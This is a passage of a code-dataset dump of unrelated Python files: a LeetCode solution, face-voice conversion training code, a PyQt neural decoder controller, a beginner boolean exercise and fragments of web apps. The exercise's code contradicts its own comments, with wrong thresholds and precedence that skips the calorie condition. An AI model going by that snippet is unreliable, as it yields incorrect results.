folder.folder_name))\n\n return quick_respone(dic={'file':download_url})\n","repo_name":"NoManWorkingITPJMnage/yunpan_be","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10758294031","text":"class Solution:\r\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\r\n inserted = []\r\n while intervals:\r\n s,e = newInterval\r\n nS,nE = intervals[0]\r\n if e < nS:\r\n return inserted + [newInterval] + intervals\r\n elif nS <= s <= e <= nE:\r\n return inserted + intervals\r\n elif nE < s:\r\n inserted.append(intervals.pop(0))\r\n else :\r\n newInterval = [min(s,nS), max(e,nE)]\r\n intervals.pop(0)\r\n return inserted + [newInterval]\r\n \r\n\r\n\r\n \r\n\r\n\r\n","repo_name":"abhinand5ai/Fluency","sub_path":"LC/monthly/2020/Sep/insertInterval.py","file_name":"insertInterval.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69807979465","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\nimport os\nimport random\nfrom src.dataset import FaceSpeech_dataset\nfrom models.vqmivc_encoder import Encoder, CPCLoss_sameSeq, Encoder_lf0\nfrom models.vqmivc_decoder import Decoder_ac\nfrom models import FACE_ENCODER\nfrom models.vqmivc_mi_estimators import CLUBSample_group, CLUBSample_reshape\nfrom src.logger import Logger\nfrom torch.nn import DataParallel as DP\nfrom torch.utils.data import DataLoader\nfrom collections import OrderedDict\nimport numpy as np\nfrom torch.autograd import grad\nimport copy\nfrom glob import glob\nfrom tqdm import tqdm\nimport soundfile as sf\nfrom itertools import chain\nfrom pathlib import Path\nfrom src.scheduler import WarmupScheduler\nimport kaldiio\nfrom Tools.preprocess.pwg_vqmivc_spectrogram import logmelspectrogram\nimport resampy\nimport pyworld as pw\nimport subprocess\nimport matplotlib.pyplot as plt\nfrom Experiment.experiment_tools import extract_logmel, seed_worker\n\n\nclass ExperimentBuilder(nn.Module):\n def __init__(self,config):\n super(ExperimentBuilder, self).__init__()\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n # torch.backends.cudnn.enabled = True\n seed = config.getint(\"hparams\",\"seed\")\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n random.seed(seed)\n np.random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n # os.environ['CUBLAS_WORKSPACE_CONFIG'] = ':4096:8'\n\n self.is_train = config.getboolean(\"input\", \"is_train\")\n self.if_provide_pseudo = config.getboolean(\"model\", \"if_provide_pseudo\")\n self.train_if_decvtor = False\n if self.is_train:\n os.environ['CUDA_VISIBLE_DEVICES'] = config.get(\"hparams\",\"gpu\")\n else:\n os.environ['CUDA_VISIBLE_DEVICES'] = config.get(\"hparams\",\"infer_gpu\")\n\n self.output_path=config.get(\"output\",\"output_dir\")\n if config.getboolean(\"input\",\"is_train\"):\n self.logger = Logger(os.path.join(self.output_path, 'log'))\n self.config = config\n\n if config.get(\"model\",\"encoder_lf0_type\") == \"no_emb\":\n self.dim_lf0 = 1\n else:\n self.dim_lf0 = 64\n\n\n self.encoder = Encoder(in_channels=config.getint(\"model\",\"encoder_in_channels\"), \n channels= config.getint(\"model\",\"encoder_channels\"), \n n_embeddings= config.getint(\"model\",\"encoder_n_embeddings\"), \n z_dim = config.getint(\"model\",\"encoder_z_dim\"), \n c_dim= config.getint(\"model\",\"encodr_c_dim\"))\n self.encoder_lf0 = Encoder_lf0(config.get(\"model\",\"encoder_lf0_type\"))\n self.cpc = CPCLoss_sameSeq(n_speakers_per_batch = config.getint(\"model\",\"n_speakers_per_batch\"),\n n_utterances_per_speaker = config.getint(\"model\",\"n_utterances_per_speaker\"),\n n_prediction_steps = config.getint(\"model\",\"n_prediction_steps\"),\n n_negatives = config.getint(\"model\",\"n_negatives\"),\n z_dim = config.getint(\"model\",\"encoder_z_dim\"), \n c_dim= config.getint(\"model\",\"encodr_c_dim\"))\n\n self.encoder_spk = FACE_ENCODER[config.get(\"model\",\"face_encoder\")](config.getint(\"model\", \"slot_size\"),config.getint(\"model\", \"slot_channel_size\"))\n\n self.decoder = Decoder_ac(dim_neck=config.getint(\"model\",\"encoder_z_dim\"), dim_lf0=self.dim_lf0, use_l1_loss=True)\n self.speech_decoder = copy.deepcopy(self.decoder)\n\n self.encoder.cuda()\n self.encoder_lf0.cuda()\n self.cpc.cuda()\n self.encoder_spk.cuda()\n self.decoder.cuda()\n self.speech_decoder.cuda()\n\n self.all_models = [self.encoder, self.encoder_lf0, \n self.cpc, self.encoder_spk, self.decoder, self.speech_decoder]\n\n self.optimizer = torch.optim.Adam(\n chain(self.encoder_spk.parameters(), self.decoder.parameters()),\n lr=config.getfloat(\"hparams\",\"scheduler_initial_lr\")) \n\n if config.getboolean(\"input\",\"is_train\"):\n root_path = Path(config.get(\"input\",\"data_path\"))\n self.train_data = FaceSpeech_dataset(\n root = root_path,\n n_sample_frames = config.getint(\"hparams\",\"sample_frames\"),\n mode='train' + '_' + config.get(\"input\",\"spk_num\"),\n face_type=config.get(\"model\", \"face_type\"),\n speech_type=config.get(\"model\", \"speech_type\"),\n if_provide_pseudo = self.if_provide_pseudo\n )\n\n self.valid_dataset = FaceSpeech_dataset(\n root = root_path,\n n_sample_frames = config.getint(\"hparams\",\"sample_frames\"),\n mode='valid' + '_' + config.get(\"input\",\"spk_num\"),\n face_type=config.get(\"model\",\"face_type\"),\n speech_type=config.get(\"model\", \"speech_type\"),\n if_provide_pseudo = self.if_provide_pseudo\n )\n\n self.dataloader = DataLoader(\n self.train_data,\n batch_size=config.getint(\"hparams\",\"batch_size\"), # 256\n shuffle=True,\n num_workers=config.getint(\"hparams\",\"n_works\"),\n pin_memory=True,\n worker_init_fn=seed_worker,\n drop_last=False)\n\n self.valid_dataloader = DataLoader(\n self.valid_dataset,\n batch_size=config.getint(\"hparams\",\"batch_size\"), # 256\n shuffle=False,\n num_workers=config.getint(\"hparams\",\"n_works\"),\n pin_memory=True,\n worker_init_fn=seed_worker,\n drop_last=False)\n\n warmup_epochs = 2000 // (len(self.train_data) // config.getint(\"hparams\",\"batch_size\"))\n print('warmup_epochs:', warmup_epochs)\n self.scheduler = WarmupScheduler(\n self.optimizer,\n warmup_epochs = warmup_epochs,\n initial_lr = config.getfloat(\"hparams\",\"scheduler_initial_lr\"),\n max_lr = config.getfloat(\"hparams\",\"scheduler_max_lr\"),\n milestones = [config.getint(\"hparams\",\"scheduler_milestones_0\"), \n config.getint(\"hparams\",\"scheduler_milestones_1\"),\n config.getint(\"hparams\",\"scheduler_milestones_2\"),],\n gamma = config.getfloat(\"hparams\",\"scheduler_gamma\")\n )\n\n\n self.iteration = 0\n \n try:\n self.checkpont = config.get(\"model\",\"checkpoint\")\n except:\n self.checkpont = None\n\n if self.checkpont is not None:\n self.load_ckpt(os.path.join(self.output_path,'models',self.checkpont))\n else:\n self.start_epoch = 1\n \n self.load_pretrain(config.get(\"model\", \"pretrain_model_path\"))\n \n self.kl_loss = nn.KLDivLoss(reduction=\"batchmean\", log_target=True)\n self.lambda_spk_emb_recall = self.config.getfloat(\"hparams\", \"lambda_spk_emb_recall\")\n self.lambda_address_recall = self.config.getfloat(\"hparams\", \"lambda_address_recall\")\n self.lambda_speech_rec = self.config.getfloat(\"hparams\", \"lambda_speech_rec\")\n self.lambda_diff_rec = self.config.getfloat(\"hparams\", \"lambda_diff_rec\")\n\n try:\n self.if_address_mse = self.config.getboolean(\"model\", \"if_address_mse\")\n except:\n self.if_address_mse = False\n \n try:\n self.if_decoder_no_grad = self.config.getboolean(\"model\", \"if_decoder_no_grad\")\n except:\n self.if_decoder_no_grad = False\n\n def to_eval(self):\n for m in self.all_models:\n m.eval()\n\n def to_train(self):\n for m in self.all_models:\n m.train()\n\n def load_ckpt(self, ckpt_path):\n pass\n\n\n def load_pretrain(self, ckpt_path):\n pretrain_checkpoint = torch.load(ckpt_path, map_location=lambda storage, loc: storage)\n if self.config.getboolean(\"model\", \"pretrain_encoder\"):\n self.encoder.load_state_dict(pretrain_checkpoint['encoder'])\n if self.config.getboolean(\"model\", \"pretrain_decoder\"):\n self.decoder.load_state_dict(pretrain_checkpoint['decoder'])\n self.speech_decoder.load_state_dict(pretrain_checkpoint['decoder'])\n if self.config.getboolean(\"model\", \"pretrain_cpc\"):\n self.cpc.load_state_dict(pretrain_checkpoint['cpc'])\n if self.config.getboolean(\"model\", \"pretrain_speech_spk_encoder\"):\n self.encoder_spk.speech_encoder.load_state_dict(pretrain_checkpoint['encoder_spk'])\n print(f'Load pretrain model from {ckpt_path}')\n\n\n def save_ckpt(self, epoch, ckpt_path=False):\n if not ckpt_path:\n # ckpt_path = os.path.join(self.output_root, self.output_path[2:], 'models', 'Best_model.rec_%.4f_ckpt-%04d.pt' % (val_mean[0], epoch))\n ckpt_path = os.path.join( self.output_path,'models','checkpoint', \"model.ckpt-{:0>4d}.pt\".format(epoch)) \n print(f\"Saving Facevc model and optimizer at epoch {epoch} iteration {self.iteration} to {ckpt_path}\")\n else:\n print(f\"Saving Current Best Facevc model and optimizer at epoch {epoch} iteration {self.iteration} to {ckpt_path}\")\n checkpoint_state = {\n \"encoder\": self.encoder.state_dict(),\n \"encoder_lf0\": self.encoder_lf0.state_dict(),\n \"cpc\": self.cpc.state_dict(),\n \"encoder_spk\": self.encoder_spk.state_dict(),\n \"decoder\": self.decoder.state_dict(),\n \"optimizer\": self.optimizer.state_dict(),\n \"scheduler\": self.scheduler.state_dict(),\n \"epoch\": epoch\n }\n torch.save(checkpoint_state, ckpt_path)\n \n def run_train_iter(self):\n raise NotImplementedError\n def run_valid_iter(self):\n raise NotImplementedError\n\n\n def run_valid(self):\n print('Please waiting! Valid')\n self.val_average_face_recon_loss = self.val_average_speech_recon_loss = self.val_average_speech_emb_recall_loss = self.val_average_address_recall_loss = 0\n self.to_eval()\n\n cur_epoch_metrics_val = []\n for self.val_idx, batch in enumerate(self.valid_dataloader, 1):\n metrics = self.run_valid_iter(batch)\n cur_epoch_metrics_val.append([v for k, v in metrics.items()])\n val_keys = [k for k in metrics.keys()]\n self.to_train()\n \n return cur_epoch_metrics_val, val_keys\n\n\n def run_experiment(self):\n best_score = 1000\n for epoch in range(self.start_epoch, self.config.getint(\"hparams\",\"n_epochs\")+1):\n self.average_face_recon_loss = self.average_speech_recon_loss = self.average_speech_emb_recall_loss = self.average_address_recall_loss = 0\n\n epoch_start_time = time.time()\n cur_epoch_metrics = []\n cur_epoch_metrics_val = []\n for self.idx, batch in enumerate(self.dataloader ,1):\n metrics = self.run_train_iter(batch)\n # self.logger.log_training(metrics, self.iteration)\n cur_epoch_metrics.append([v for k, v in metrics.items()])\n self.iteration = self.iteration + 1\n\n train_keys = [k for k in metrics.keys()]\n epoch_train_time = time.time() - epoch_start_time\n train_mean = np.mean(cur_epoch_metrics, axis=0)\n\n description = (', ').join(['{}: {:.4f}'.format(k, v) for k, v in zip(train_keys, train_mean)])\n Train_num = 'Epoch {:3d} Inter {:4d} '.format(epoch,self.iteration)\n description = Train_num + description\n print(description)\n\n if epoch == 1:\n cur_epoch_metrics_val, val_keys = self.run_valid()\n epoch_total_time = time.time() - epoch_start_time\n val_mean = np.mean(cur_epoch_metrics_val, axis=0)\n\n elif self.config.get(\"input\",\"dataset\") == 'lrs3' and epoch%5==0:\n # One epoch metrics\n cur_epoch_metrics_val, val_keys = self.run_valid()\n epoch_total_time = time.time() - epoch_start_time\n val_mean = np.mean(cur_epoch_metrics_val, axis=0)\n bests = glob(os.path.join( self.output_path, 'models', 'Best_*.pt'))\n bests.sort()\n if len(bests) > 3:\n for prev in bests[3:]:\n os.remove(prev)\n\n if val_mean[0] < best_score and epoch > 0.3 * (self.config.getint(\"hparams\",\"n_epochs\")+1):\n ckpt_path = os.path.join( self.output_path, 'models', 'Best_model.rec_%.4f_ckpt-%04d.pt' % (val_mean[0], epoch))\n best_score = val_mean[0]\n self.save_ckpt(epoch, ckpt_path)\n\n elif self.config.get(\"input\", \"dataset\") == 'vgg':\n cur_epoch_metrics_val, val_keys = self.run_valid()\n epoch_total_time = time.time() - epoch_start_time\n val_mean = np.mean(cur_epoch_metrics_val, axis=0)\n\n\n self.logger.log_epoch(train_mean, val_mean, train_keys,val_keys,\n epoch_train_time, epoch_total_time, epoch)\n self.scheduler.step()\n\n if not os.path.exists(os.path.join( self.output_path,'models','checkpoint')):\n os.makedirs(os.path.join( self.output_path,'models','checkpoint'))\n\n if (epoch % 50==0 ):\n self.save_ckpt(epoch)\n save_model_paths = glob(os.path.join( self.output_path, 'models', 'checkpoint','*.pt'))\n save_model_paths.sort()\n if len(save_model_paths) > 3:\n for prev in save_model_paths[:3]:\n os.remove(prev)\n \n\n\nclass Facevoice_memory_vqmivc_pretrain_pseudo(ExperimentBuilder):\n def __init__(self,config):\n super(Facevoice_memory_vqmivc_pretrain_pseudo,self).__init__(config)\n\n\n def mi_second_forward(self, mels, lf0, input_face, input_speech, speech_rec=False):\n self.optimizer.zero_grad()\n\n face, diff_face = input_face\n speech, diff_speech = input_speech \n z, c, _, vq_loss, perplexity = self.encoder(mels)\n # print(mels[5,:])\n cpc_loss, accuracy = self.cpc(z, c)\n speech_emb, speech_emb_recall, face_emb, face_emb_recall, speech_address, face_address = self.encoder_spk(face, speech)\n diff_face_emb_recall= self.encoder_spk.forward_face(diff_face)\n diff_speech_emb = self.encoder_spk.forward_speech(diff_speech)\n # diff_face_emb_recall_1 = diff_face_emb_recall_1.detach()\n # diff_speech_emb_1 = diff_speech_emb_1.detach() \n\n speech_emb_recall_loss = F.mse_loss(speech_emb, speech_emb_recall)\n address_recall_loss = self.kl_loss(face_address, speech_address)\n\n lf0_embs = self.encoder_lf0(lf0)\n face_recon_loss, pred_mels = self.decoder(z, lf0_embs, face_emb_recall, mels.transpose(1,2))\n face_pred_mels, face_pred_mels_postnet = self.decoder.forward_pseudo(z, lf0_embs, diff_face_emb_recall, mels.transpose(1,2), if_no_grad=self.if_decoder_no_grad)\n speech_pred_mels, speech_pred_mels_postnet = self.speech_decoder.forward_pseudo(z, lf0_embs, diff_speech_emb, mels.transpose(1,2), if_no_grad=self.if_decoder_no_grad)\n speech_recon_loss = torch.tensor(0.)\n\n diff_pred_recon_loss = torch.tensor(0.).cuda()\n\n\n diff_pred_recon_loss = F.mse_loss(face_pred_mels, speech_pred_mels_postnet) + \\\n F.l1_loss(face_pred_mels, speech_pred_mels_postnet) + \\\n F.l1_loss(face_pred_mels_postnet, speech_pred_mels_postnet) + \\\n F.mse_loss(face_pred_mels_postnet, speech_pred_mels_postnet)\n\n loss = face_recon_loss + self.lambda_spk_emb_recall * speech_emb_recall_loss + \\\n self.lambda_address_recall * address_recall_loss + self.lambda_diff_rec * diff_pred_recon_loss\n \n loss.backward()\n\n if self.config.getboolean(\"model\",\"train_if_clip\"):\n torch.nn.utils.clip_grad_norm_(chain(self.encoder_spk.parameters(), self.decoder.parameters()), self.config.getfloat(\"hparams\",\"clip_value\"))\n\n self.optimizer.step()\n return face_recon_loss, speech_recon_loss, speech_emb_recall_loss, address_recall_loss, diff_pred_recon_loss\n\n\n def run_train_iter(self,batch):\n step_start_time = time.time()\n mels, lf0, speakers, face, speech, diff_face, diff_speech,= batch\n\n mels = mels.cuda() \n lf0 = lf0.cuda()\n # print(speakers)\n face = face.cuda().squeeze(1) # (256, 1, 512)\n diff_face= diff_face.cuda().squeeze(1)\n input_face = [face, diff_face]\n\n speech = speech.cuda().squeeze(1)\n diff_speech= diff_speech.cuda().squeeze(1)\n input_speech = [speech, diff_speech]\n\n face_recon_loss, speech_recon_loss, speech_emb_recall_loss, address_recall_loss, diff_pred_recon_loss = self.mi_second_forward(mels, lf0, input_face, input_speech)\n \n metrics = OrderedDict()\n metrics['face_recon_loss'] = face_recon_loss\n metrics['speech_recon_loss'] = speech_recon_loss\n metrics['diff_pred_recon_loss'] = diff_pred_recon_loss\n metrics['speech_emb_recall_loss'] = speech_emb_recall_loss\n metrics['address_recall_loss'] = address_recall_loss\n metrics['Steptime'] = time.time()-step_start_time\n metrics['lr'] = self.optimizer.param_groups[0]['lr']\n return metrics\n\n\n def run_valid_iter(self,batch):\n\n mels, lf0, speakers, face, speech, diff_face, diff_speech= batch\n mels = mels.cuda() \n lf0 = lf0.cuda()\n\n face = face.cuda().squeeze(1) # (256, 1, 512)\n diff_face= diff_face.cuda().squeeze(1)\n input_face = [face, diff_face]\n\n speech = speech.cuda().squeeze(1)\n diff_speech= diff_speech.cuda().squeeze(1)\n input_speech = [speech, diff_speech]\n\n with torch.no_grad():\n z, c, z_beforeVQ, vq_loss, perplexity = self.encoder(mels)\n speech_emb, speech_emb_recall, face_emb, face_emb_recall, speech_address_log, face_address_log = self.encoder_spk(face, speech)\n diff_face_emb_recall = self.encoder_spk.forward_face(diff_face)\n diff_speech_emb = self.encoder_spk.forward_speech(diff_speech)\n \n speech_emb_recall_loss = F.mse_loss(speech_emb, speech_emb_recall)\n address_recall_loss = self.kl_loss(face_address_log, speech_address_log)\n\n lf0_embs = self.encoder_lf0(lf0)\n face_recon_loss, pred_mels = self.decoder(z, lf0_embs, face_emb_recall, mels.transpose(1,2))\n face_pred_mels, face_pred_mels_postnet = self.decoder.forward_pseudo(z, lf0_embs, diff_face_emb_recall, mels.transpose(1,2))\n speech_pred_mels, speech_pred_mels_postnet = self.speech_decoder.forward_pseudo(z, lf0_embs, diff_speech_emb, mels.transpose(1,2))\n diff_pred_recon_loss = torch.tensor(0.).cuda()\n\n diff_pred_recon_loss = F.mse_loss(face_pred_mels, speech_pred_mels_postnet) + \\\n F.l1_loss(face_pred_mels, speech_pred_mels_postnet) + \\\n F.l1_loss(face_pred_mels_postnet, speech_pred_mels_postnet) + \\\n F.mse_loss(face_pred_mels_postnet, speech_pred_mels_postnet)\n\n\n metrics = OrderedDict()\n metrics['val_face_recon_loss'] = face_recon_loss\n metrics['val_speech_emb_recall_loss'] = speech_emb_recall_loss\n metrics['val_address_recall_loss'] = address_recall_loss\n metrics['val_diff_pred_recon_loss'] = diff_pred_recon_loss\n return metrics\n\n\n\n \n\n\n \n\n\n\n \n\n\n \n\n \n\n\n","repo_name":"Levent9/Zero-shot-FaceVC","sub_path":"Experiment/experiment_memory_vqmivc_pretrain_pseudo.py","file_name":"experiment_memory_vqmivc_pretrain_pseudo.py","file_ext":"py","file_size_in_byte":20082,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"42025465904","text":"import os\nimport traceback\n\nimport loguru\nimport matplotlib\nimport numpy as np\nimport requests\n\nfrom app.ui.bad_channel_ui import ChannelWidget\nfrom app.utils.sys_tools import bind_cpu\n\nmatplotlib.use(\"Qt5Agg\") # 声明使用pyqt5\nimport pyqtgraph as pg\n\nfrom app.services.dog_walk_decoder_service import DogWalkDecoderService\nfrom app.utils.asyncqt5 import async_qt\nfrom ui.eeg_decoder import Ui_MainWindow\nfrom app.config.decoder_setting import DecoderSetting, NeuroSetting, BehaviorSetting, MotionInputTypeEnum, \\\n TargetTypeEnum, DogWalkDecodeSetting\n\n\nclass DecoderService:\n colors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'w']\n\n def __init__(self):\n self.win: Ui_MainWindow = None\n self._engry_data = []\n self._decode = None\n self._decoding = False\n self.log_level = 1\n self._plots = [ \"速度\", \"位置\"]\n # self._filter_channel_widget = ChannelWidget()\n # self.init_bad_channel()\n self.data_length = 100\n self.sub_plots = []\n self._filter_channel_widget = None\n bind_cpu(0x0001)\n\n def init_bad_channel(self):\n self._filter_channel_widget = ChannelWidget()\n bad_chs = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,\n 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29,\n 30, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44,\n 46, 47, 48, 49, 50, 51, 52, 54, 55, 56, 57, 58, 60, 61,\n 62, 64, 65, 66, 68, 73, 74, 76, 81, 82, 83, 84, 86, 87,\n 88, 89, 90, 91, 94, 96, 97, 98, 99, 100, 101, 102, 103, 104,\n 105, 106, 107, 108, 109, 110, 112, 113, 114, 115, 116, 117, 118, 119,\n 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 132, 133, 134,\n 135, 136, 137, 138, 140, 141, 143, 145, 146, 149, 150, 151, 152, 153,\n 154, 156, 158, 159, 161, 162, 166, 168, 169, 170, 172, 173, 174, 175,\n 176, 177, 178, 179, 180, 181, 185, 186, 187, 193, 194, 195, 196, 198,\n 201, 202, 203, 204, 205, 207, 209, 210, 211, 212, 214, 216, 217, 218,\n 219, 220, 222, 223, 224, 225, 226, 227, 229, 231, 232, 233, 234, 236,\n 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250,\n 251, 252, 253, 254, 255, 256\n ]\n bad_chs = [_ - 1 for _ in bad_chs]\n self._filter_channel_widget.set_bad_channels(bad_chs)\n\n def get_eeg_impedances(self):\n try:\n host = \"127.0.0.1:10800\"\n host = os.environ.get(\"ME_HOST\", host)\n loguru.logger.debug(f\"http://{host}/api/v1/board/impedances?refresh=false\")\n r = requests.get(f\"http://{host}/api/v1/board/impedances?refresh=false\", timeout=1.0)\n return r.json()['data']\n except Exception as e:\n loguru.logger.exception(e)\n return {}\n\n def console_log(self, text, level: int=0):\n if level > 4: level = 4\n if level < 0: level = 0\n color = {\n 0: '#999999', # trace\n 1: '#666666', # debug\n 2: 'green', # info\n 3: '#FFCC00', # warn\n 4: 'red' # error\n }\n html = f\"- <span style='color: {color[level]}'>{text}</span>\"\n if level >= self.log_level:\n self.win.logBrowser.append(html)\n my_cursor = self.win.logBrowser.textCursor()\n self.win.logBrowser.moveCursor(my_cursor.End)\n\n def set_ui(self, ui):\n self.win = ui\n self.init_bad_channel()\n\n def init_subplot(self):\n # self.win.plotWidget.addLegend()\n for i, each in enumerate(self._plots):\n sub_plot = self.win.plotWidget.addPlot(row=i, col=0, title=f\"{each}\")\n sub_plot.addLegend()\n timeline = [i for i in range(self.data_length)]\n sub_plot.setLabel(\"left\", \"运动幅度/m\")\n sub_plot.setLabel(\"bottom\", \"时间\")\n if i == 0:\n sub_plot.setYRange(min=-2, # 最小值\n max=2) # 最大值\n else:\n sub_plot.setYRange(min=-0.2, # 最小值\n max=0.2) # 最大值\n plot_curves = {}\n self.sub_plots.append({\n 'sub_plot': sub_plot,\n 'timeline': timeline,\n 'plot_curves': plot_curves\n })\n\n def clear_plot(self):\n for subplot in self.sub_plots:\n subplot['timeline'] = [i for i in range(self.data_length)]\n plot_curves = subplot['plot_curves']\n for tag,v in plot_curves.items():\n curve, data = v\n for i in range(len(data)):\n data[i] = 0\n curve.setData(subplot['timeline'], data)\n\n def init_graph(self):\n if not self.sub_plots:\n self.init_subplot()\n\n selected_devices = ['pred', 'real']\n\n for j, subplot in enumerate(self.sub_plots):\n sub_plot = subplot['sub_plot']\n plot_curves = subplot['plot_curves']\n for i, tag in enumerate(selected_devices):\n curve = sub_plot.plot(\n pen=pg.mkPen(self.colors[i], width=2), name=tag\n )\n\n plot_curves[tag] = curve, [0 for i in range(self.data_length)]\n else:\n self.clear_plot()\n\n\n\n def __update_data(self, data_array, num, timeline, curve):\n data_array.append(num)\n data_array.pop(0)\n curve.setData(timeline, data_array)\n\n def update_data(self, data:dict):\n # loguru.logger.debug(data)\n # self.console_log(f\"{data}\", level=2)\n timeline = self.sub_plots[0]['timeline']\n\n curve_speed_pred, data_speed_pred = self.sub_plots[0]['plot_curves']['pred']\n self.__update_data(data_speed_pred, data['pred'][0][0], timeline, curve_speed_pred)\n\n curve_pos_pred, data_pos_pred = self.sub_plots[1]['plot_curves']['pred']\n self.__update_data(data_pos_pred, data['pred'][0][1], timeline, curve_pos_pred)\n\n curve_speed_real, data_speed_real = self.sub_plots[0]['plot_curves']['real']\n self.__update_data(data_speed_real, data['motion'][0], timeline, curve_speed_real)\n\n curve_pos_real, data_pos_real = self.sub_plots[1]['plot_curves']['real']\n self.__update_data(data_pos_real, data['motion'][1], timeline, curve_pos_real)\n\n v_c = np.corrcoef(data_speed_pred, data_speed_real)\n p_c = np.corrcoef(data_pos_pred, data_pos_real)\n msg = f\"cc=v={v_c[0][1]} p={p_c[0][1]} real={data['motion']}\"\n self.console_log(msg, level=2)\n\n def start(self):\n if self._decoding is False:\n try:\n self.console_log(f\"开始解码\", 2)\n self.win.starDecode.setDisabled(True)\n self.decode()\n self.win.starDecode.setText(\"停止解码\")\n self.win.starDecode.setDisabled(False)\n self._decoding = True\n except Exception as e:\n self.console_log(f\"启动解码失败:{e}\", 4)\n loguru.logger.exception(e)\n self._decoding = False\n self.win.starDecode.setDisabled(False)\n self.win.starDecode.setText(\"解码\")\n else:\n self.console_log(f\"停止解码\", 2)\n self._decode.stop_decode()\n self._decoding = False\n self.win.starDecode.setText(\"解码\")\n\n def msg_pull(self, *args):\n self.console_log(f\"{args}\", level=3)\n\n def decode(self):\n # neural_fs = 4000\n # bad_chs = [\n # 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,\n # 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29,\n # 30, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44,\n # 46, 47, 48, 49, 50, 51, 52, 54, 55, 56, 57, 58, 60, 61,\n # 62, 64, 65, 66, 68, 73, 74, 76, 81, 82, 83, 84, 86, 87,\n # 88, 89, 90, 91, 94, 96, 97, 98, 99, 100, 101, 102, 103, 104,\n # 105, 106, 107, 108, 109, 110, 112, 113, 114, 115, 116, 117, 118, 119,\n # 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 132, 133, 134,\n # 135, 136, 137, 138, 140, 141, 143, 145, 146, 149, 150, 151, 152, 153,\n # 154, 156, 158, 159, 161, 162, 166, 168, 169, 170, 172, 173, 174, 175,\n # 176, 177, 178, 179, 180, 181, 185, 186, 187, 193, 194, 195, 196, 198,\n # 201, 202, 203, 204, 205, 207, 209, 210, 211, 212, 214, 216, 217, 218,\n # 219, 220, 222, 223, 224, 225, 226, 227, 229, 231, 232, 233, 234, 236,\n # 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250,\n # 251, 252, 253, 254, 255, 256\n # ]\n # bad_chs = [_ - 1 for _ in bad_chs]\n bad_chs = self._filter_channel_widget.get_bad_channels()\n neural_fbands = self.win.neuralFbands.toPlainText()\n neural_fbands = [F.strip().split('-') for F in neural_fbands.split('\\n') if F.strip() ]\n loguru.logger.debug(neural_fbands)\n neuro_setting = NeuroSetting(\n neuro_bad_channels=bad_chs,\n neural_fbands=neural_fbands,\n )\n behavior_input_filter = self.win.behaviorInpFilter.currentText()\n behavior_target_type = self.win.behavioTargetType.currentText().split('-')\n behavior = BehaviorSetting(\n behavior_target_type=behavior_target_type,\n behavior_input_filter=behavior_input_filter if behavior_input_filter != 'none' else None\n )\n config = DecoderSetting(neuro=neuro_setting,\n bin_size=self.win.binSizeDoubleSpinBox.value(),\n behavior=behavior,\n nbins_train=self.win.nbinsTrainSpinBox_2.value(),\n ncomponents=self.win.ncomponentsSpinBox.value()\n )\n dog_setting = DogWalkDecodeSetting(motion_field=self.win.behaviorField.currentText())\n self._decode = DogWalkDecoderService(config, dog_setting=dog_setting)\n self._decode.message_push_trigger.connect(self.update_data)\n self._decode.err_push_trigger.connect(self.msg_pull)\n async_qt.async_run(self._decode.decode(), errcall=self.connect_err_callback)\n self.init_graph()\n\n def connect_err_callback(self, e):\n loguru.logger.debug(traceback.format_exc())\n self.console_log(e, 4)\n\n def filter_channel(self):\n loguru.logger.info(\"filter channel\")\n self._filter_channel_widget.show()\n\n\n\ndecoder_service = DecoderService()\n\n\nclass DecoderController:\n def __init__(self, ui:Ui_MainWindow, loop=None):\n self.ui:Ui_MainWindow = ui\n self.loop = loop\n self.init()\n\n def init(self):\n self.ui.plotWidget.setBackground('w')\n decoder_service.set_ui(self.ui)\n self.ui.starDecode.clicked.connect(decoder_service.start)\n self.ui.filterChannel.clicked.connect(decoder_service.filter_channel)\n\n","repo_name":"YunDid/NeuroXess","sub_path":"mind-explorer-plugin/app/controller/decoder_controller.py","file_name":"decoder_controller.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15219508479","text":"# John wants lose 10 pounds in one month. \n# There are multiple conditions to lose 10 pounds in a month \n# John needs to walk 10000 steps daily OR needs to run at least\n# 4 miles a day. and Addition to these , John needs to eat less \n# than 1500 calories daily. We should create a program to calculate \n# if John can loose weight or not \n# daily steps,running distance and daily calory intake will be given by users.\n#Our goal is to print True when John can loose weight and print False otherwise.\n\nsteps=int(input(\"How many steps do you walk dayly?\"))\nmilesRun=int(input(\"How many miles do you run daily?\"))\ncalories=int(input(\"How many calories do you eat daily?\"))\ngoal=steps>=1000 or milesRun>=10 and calories<=1500\nprint(goal)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zhannakarayeva/devops","sub_path":"Python/BooleanType/bool_ex7.py","file_name":"bool_ex7.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37768401024","text":"from flask import (render_template, redirect, \n url_for, request)\nfrom models import db, Project, app\nfrom completed_projects import PROJECTS\nfrom datetime import datetime\n\n\ndef insert_project_data():\n for project in PROJECTS:\n project_in_db = (Project.query.filter\n 